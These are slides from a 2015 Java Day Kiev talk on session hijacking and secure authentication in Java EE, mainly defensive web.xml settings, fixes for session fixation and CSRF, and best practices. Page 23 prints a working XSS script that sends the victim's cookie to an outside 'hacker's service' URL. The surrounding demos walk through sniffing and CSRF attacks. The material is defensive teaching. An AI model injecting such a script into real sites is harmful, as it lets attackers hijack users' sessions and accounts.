
Secure Authentication and Session Management in Java EE


Page 1: Secure Authentication and Session Management in Java EE

Secure Authentication and Session Management in Java EE

Patrycja Wegrzynowicz
CTO, Yonita, Inc.
Java Day Kiev 2015

Page 2

(c) Patrycja Wegrzynowicz @yonlabs

About Me

• 15+ years of professional experience
• Software engineer, architect, head of software R&D
• Author and speaker
  • JavaOne, Devoxx, JavaZone, TheServerSide Java Symposium, Jazoon, OOPSLA, ASE, others
• Finalizing PhD in Computer Science
• Founder and CTO of Yonita
  • Bridge the gap between the industry and the academia
  • Automated detection and refactoring of software defects
  • Trainings and code reviews
  • Security, performance, concurrency, databases
• Twitter: @yonlabs

Page 3

Agenda

• HTTP, session, OWASP
• 4 demos to hijack a session
• Best practices in Java EE

Page 4

Security Stories 2014/2015

Page 5

HTTP

Page 6

What is Web Session?

• Session identifies interactions with one user
• Unique identifier associated with every request
  • Cookie
  • Header
  • Parameter
  • Hidden field

Page 7

OWASP Top 10 Risks

Page 8

Session Hijacking

• Session theft
  • URL, sniffing, logs, XSS
• Session fixation
• Session prediction

Page 9

Demo: Session Exposed in URL

• I will log in to the sample application
• I will post a link with my session id on Twitter
  • @yonlabs
• Hijack my session :)

Page 10

How to Avoid Session Id in URL?

• Default: allows cookies and URL rewriting
  • Default cookie, fallback on URL rewriting
  • To embrace all users
    • Disabled cookies in a browser
• Disable URL rewriting in an app server
  • App server specific
• Tracking mode
  • Java EE 6, web.xml

Page 11

web.xml

    <!-- Java EE 6, Servlet 3.0 -->
    <session-config>
        <tracking-mode>COOKIE</tracking-mode>
    </session-config>

Page 12

Session Sniffing

• How to find out a cookie?
  • e.g., network monitoring and packet sniffing
• How to use a cookie?
  • Browsers' plugins and add-ons (e.g., Cookie Manager for Firefox)
  • Intercepting proxy (e.g., OWASP ZAP)
  • DIY: write your own code

Page 13

Demo: Session Sniffing

• You will log in to the sample application
  • Any non-empty username
  • Please, use meaningful names, the victim will get a geecoin!
• I will monitor network traffic
  • tcpdump
• I will hijack one of your sessions
  • Cookie Manager

Page 14

How to Avoid Session Exposure During Transport?

Page 15

How to Avoid Session Exposure During Transport?

Encrypt! Use HTTPS.

Page 16

web.xml

    <security-constraint>
        <!-- The slide shows only the transport guarantee; a security-constraint
             also needs a web-resource-collection. /* is assumed here so that
             every URL of the application is covered. -->
        <web-resource-collection>
            <web-resource-name>whole application</web-resource-name>
            <url-pattern>/*</url-pattern>
        </web-resource-collection>
        <user-data-constraint>
            <transport-guarantee>CONFIDENTIAL</transport-guarantee>
        </user-data-constraint>
    </security-constraint>

Page 17

web.xml

    <!-- Java EE 6, Servlet 3.0 -->
    <session-config>
        <cookie-config>
            <secure>true</secure>
        </cookie-config>
        <tracking-mode>COOKIE</tracking-mode>
    </session-config>

Page 18

Session Exposure

• Transport
  • Unencrypted transport
• Client-side
  • XSS
  • Attacks on browsers/OS
• Server-side
  • Logs
  • Session replication
  • Memory dump

Page 19

How to Steal a Session if Secure Transport Is Used?

Page 20

How to Steal a Session if Secure Transport Is Used?

Attack a client!

Page 21

Demo: Session Grabbed by XSS

• JavaScript code to steal a cookie
• Servlet to log down stolen cookies
• Vulnerable application to be exploited via injected JavaScript code (XSS)

Page 22

Demo: Session Grabbed by XSS

• I will store malicious JavaScript code in the app
  • Through writing an "opinion"
• Log in to the vulnerable application
  • https://demo.yonita.com:8181/session-xss/
  • Any non-empty username
  • Please, use meaningful names, the victim will get a geecoin!
• Click the "View others opinions" page
• Wait until I hijack your session :)

Page 23

JavaScript to Steal a Cookie

    <script>
      // hacker's service
      var theft = 'http://demo.yonita.com/steal/steal?cookie=';
      // to bypass Same Origin Policy
      var image = new Image();
      image.src = theft + document.cookie;
    </script>

Page 24

web.xml

    <!-- Java EE 6, Servlet 3.0 -->
    <session-config>
        <cookie-config>
            <http-only>true</http-only>
            <secure>true</secure>
        </cookie-config>
        <tracking-mode>COOKIE</tracking-mode>
    </session-config>

Page 25

Session Fixation: Scenario

• Hacker opens a web page of a system in a browser
  • New session initialized
• Hacker writes down the session id
• Hacker leaves the browser open
• User comes and logs into the app
  • Uses the session initialized by the hacker
• Hacker uses the written-down session id to hijack the user's session

Page 26

Session Fixation: Solution

• Change the session ID after a successful login
  • more generally: escalation of privileges
• Java EE 7 (Servlet 3.1)
  • HttpServletRequest.changeSessionId()
• Java EE 6
  • HttpSession.invalidate()
  • HttpServletRequest.getSession(true)

Page 27

Secure Session Management Best Practices

• Random, unpredictable session id
  • At least 16 characters
• Secure transport and storage of session id
  • Cookie preferred over URL rewriting
  • Cookie flags: secure, httpOnly
  • Consistent use of HTTPS (How to serve static content?)
  • Don't mix HTTP and HTTPS under the same domain/cookie path
  • Don't use too broad cookie paths

Page 28

Secure Authentication Best Practices

• Session creation and destruction
  • New session id after login
  • Logout button
  • Session timeouts: 2-5 minutes for critical apps, 15-30 minutes for typical apps
• Session associated with the headers of the first request
  • IP, User-Agent, ...
  • If they don't match, something's going on (invalidate!)

Page 29

Secure Authentication Best Practices cont.

• Java EE
  • Declarative authentication implemented using annotations or descriptors
    • Does not force new session id after login (session fixation possible, app server specific)
  • Programmatic authentication
    • Java EE 7, Servlet 3.1
    • HttpServletRequest: authenticate, login, logout
    • Advanced flows and requirements

Page 30

Secure Authentication Best Practices cont.

• My choice
  • Programmatic authentication with Java EE 7
    • HttpServletRequest: authenticate, login, logout
  • Declarative authorization
    • web.xml
    • @RolesAllowed, @PermitAll, @DenyAll

Page 31

What If We Can't Steal a Cookie?

Page 32

What If We Can't Steal a Cookie?

We can still use it!

Page 33

Demo: CSRF to Use a Cookie

• I will log in to the application
• Log in to the application
  • https://demo.yonita.com:8181/session-csrf/
  • Any non-empty username
  • Please, use meaningful names, the first victim will get a geecoin!
• Click the link and the button 'Click me'
  • https://demo.yonita.com:8181/attack-csrf/
• I will check my account balance :)

Page 34

CSRF: Solution

• Unique token associated with each form
  • Java EE (JSF): turned on by default
  • Any other modern framework
• Remember about REST/other services
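The per-form token from this slide, written out for a plain servlet/JSP application that does not get it from JSF, as an added example (not code from the talk): one random token per session, placed into each form as a hidden field and checked by a filter on every non-safe request. The attribute and parameter names are assumptions.

```java
import java.io.IOException;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;
import static java.nio.charset.StandardCharsets.UTF_8;
import javax.servlet.*;
import javax.servlet.annotation.WebFilter;
import javax.servlet.http.*;

// Added example (not from the slides): synchronizer token for hand-written servlets/JSPs.
@WebFilter("/*")
public class CsrfTokenFilter implements Filter {
    static final String TOKEN_ATTR = "csrf.token";   // session attribute (assumed name)
    static final String TOKEN_PARAM = "_csrf";       // hidden form field (assumed name)

    /** The session's token, created on first use; call this where the form is rendered. */
    static String tokenFor(HttpSession session) {
        String token = (String) session.getAttribute(TOKEN_ATTR);
        if (token == null) {
            byte[] bytes = new byte[32];                 // 256 random bits from a CSPRNG
            new SecureRandom().nextBytes(bytes);
            token = Base64.getUrlEncoder().withoutPadding().encodeToString(bytes);
            session.setAttribute(TOKEN_ATTR, token);
        }
        return token;
    }

    /** Constant-time comparison, so response timing does not leak the token. */
    static boolean tokenMatches(String expected, String presented) {
        return expected != null && presented != null
                && MessageDigest.isEqual(expected.getBytes(UTF_8), presented.getBytes(UTF_8));
    }
    @Override
    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest req = (HttpServletRequest) request;
        if (!req.getMethod().matches("GET|HEAD|OPTIONS")) {      // state-changing request
            HttpSession session = req.getSession(false);         // no session: nothing can match
            String expected = session == null ? null : (String) session.getAttribute(TOKEN_ATTR);
            if (!tokenMatches(expected, req.getParameter(TOKEN_PARAM))) {
                ((HttpServletResponse) response).sendError(HttpServletResponse.SC_FORBIDDEN);
                return;
            }
        }
        chain.doFilter(request, response);
    }
    @Override public void init(FilterConfig config) {}
    @Override public void destroy() {}
}
```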

Page 35

Conclusion

You are never safe!

Page 36

Continuous Integration

Page 37

Continuous Refactoring

Page 38

Continuous Learning!

Page 39

Continuous Learning

A fool with a tool is still a fool!

Page 40

Q&A

[email protected]

• Twitter: @yonlabs
• Upcoming trainings: How to attack and secure web apps in Java? Warszawa 15-16.12.2015